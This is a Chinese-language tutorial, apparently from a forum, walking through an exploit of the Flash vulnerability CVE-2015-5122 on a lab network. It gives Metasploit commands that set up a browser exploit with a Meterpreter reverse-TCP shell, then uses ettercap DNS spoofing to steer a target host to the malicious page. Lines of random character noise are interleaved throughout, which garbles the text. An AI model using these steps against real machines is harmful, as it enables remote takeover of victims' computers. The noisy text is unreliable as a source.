$ u- t$ i, d+ z/ B W. W 二、cve2015-5122漏洞实例演示虚拟机 : p8 p1 F6 X/ Z+ d* L5 R) k( i, v" M3 ~
+ K, ~8 k0 P9 V7 n, n8 ?9 s
# d9 p; u2 z d& {% Y! I/ r. u& s 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: 7 W! X9 }7 f: O/ P" ^2 _& [$ s# Z$ d4 Y$ ~
# X# ?. \: X! T$ W8 S: I/ W9 z6 r$ N
' @$ k& V5 x- i* F3 N search cve-2015-5122如图: 0 s8 _/ H# f. V6 m, R! x# Q
2 | W6 p# e- Z; N, ]/ D
# }9 \9 Z( Z5 g' J
' R7 a2 U) `" s0 ~# k
* j: {3 h4 a% ^
4 E% r. C9 Y" R x( ~( d 下面我们敲如下命令: ) i# p8 K. Y/ I% K+ ~, O2 p
) r2 k5 [! d" P* E2 s
6 d/ E' {+ t+ K& b! y9 c
use exploit/multi/browser/adobe_flash_opaque_background_uaf ; n" V5 V! [& Q4 M5 E# ?) n: D
2 D! z' C. ^, E! ]7 b+ ]8 W
1 ~2 e1 X6 _3 l: u: y set PAYLOAD windows/meterpreter/reverse_tcp % e: B2 J! `& R& C7 e
$ T$ l9 y8 ~- P: \" [* q! N2 ^
# I1 A1 H* F" Q
set LHOST 192.168.0.109
* J: R/ `5 _, w+ L 4 n) f, G# f4 n
6 U" G. Z6 B& a* v. G4 r
set URIPATH / /*根目录*/ 4 ?* H) f* L. @+ w, G" o8 `2 D' f
/ N! C5 j5 R+ Z) ~( t j
8 |, e1 R/ g0 g, }- z
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 8 L, Z: [; w5 q# p" n. E9 P5 s
% H/ U' l: d$ Z; [5 v
: @9 y: y: F+ Y# K7 [
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 4 y! w7 y' b1 n
2 w- E4 u5 C5 {& n8 A8 U# S: x9 L
然后show options如图:
! T: d9 ^ \# \+ s
# @6 \) P0 O X# O/ j3 V
9 u0 `( }+ d, C u4 Y + _" Y0 v2 n( |( n. O1 N" o" C8 y
. S0 A( T- {8 I; C1 v* B1 }0 z
7 J; b5 b; h- S" j+ R$ A% ~+ p! H 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: ; D# L' q$ b4 T" D8 ]/ h2 o9 |
6 s4 p0 Z! `0 b; Y1 t : H! Z6 ]& {* ^, _1 S+ A/ k$ I
6 m* l/ \% H. R6 K' R) [# n. c 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 " X: O) Y$ B7 ]3 V. w
' d2 E4 ?: C( P# M. c
/ A8 X( \; @& O( ^0 Q9 E Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
9 M, d# b, E' |) I6 N
. [1 F8 M, F1 ]! u! p; G" |, M
+ l. N) R0 L7 L) u
" l, D0 K( b0 D- P3 q) H3 ^
, k8 Q! f* x0 |9 I+ P
8 C2 r. T4 Q7 C0 X W 成功了,这时候我们断开ettercap,如图: - z; [2 m4 ]& b8 R
* C) U/ M5 B! _0 r ?/ n$ N3 L. y6 J8 K" u- i" F6 w- }( r' O4 l. I& Y* ?
. m- U1 ` z1 v6 A
( l ^2 n7 q$ q% m4 W' l$ T
W) g3 ^0 p) e; u: \* D
Screenshot如图: % V p5 r( f7 n
: f i, `4 f) n7 n; W2 Z8 C
% c8 {" d. T# j" B. ^ " t% R# k5 g4 b
% x1 e6 a& h0 H
# x7 o/ {: z1 F: ~
0 L1 \- Q r+ F |